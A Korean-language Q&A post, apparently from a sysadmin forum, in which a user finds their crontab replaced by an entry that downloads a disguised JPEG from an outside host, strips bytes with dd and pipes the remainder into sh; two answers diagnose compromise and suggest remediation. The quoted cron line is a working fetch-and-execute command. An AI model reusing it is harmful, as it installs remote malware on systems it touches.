내 Linux의 Crontab 항목은 매일 삭제됩니다. 나는 이 항목을 추가했고 다음 날 확인했을 때 내가 찾을 수 있는 것은 다음과 같았습니다.
*/60 * * * * curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh
동시에 루트 사용자의 crontab 항목은 여전히 존재합니다.
답변1
쉘 스크립트(JPEG로 위장됨)를 다운로드하고 실행하기 위한 crontab 항목은 시스템이 손상되었음을 나타내는 강력한 표시입니다. 영향을 받은 컴퓨터를 종료하고 IT 팀에 어떻게 해야 하는지 문의해야 합니다.
(이 손상으로 인해 crontab 항목이 사라지는 이유가 될 수 있습니다. 아마도 실수로 호스팅하는 모든 악성 코드가 crontab을 덮어쓰게 될 것입니다.)
답변2
귀하의 시스템은 "lady linux" 바이러스에 감염되었으며 보안을 최적화해야 합니다. 신비한 파일이 있는지 "/tmp" 폴더를 확인하고 사용되지 않는 TCP/UDP 포트를 차단하고 서버의 아웃바운드 대상 ooo.0o0.ooo를 차단합니다. 그러나 문제의 원인을 찾는 것은 어려울 것입니다.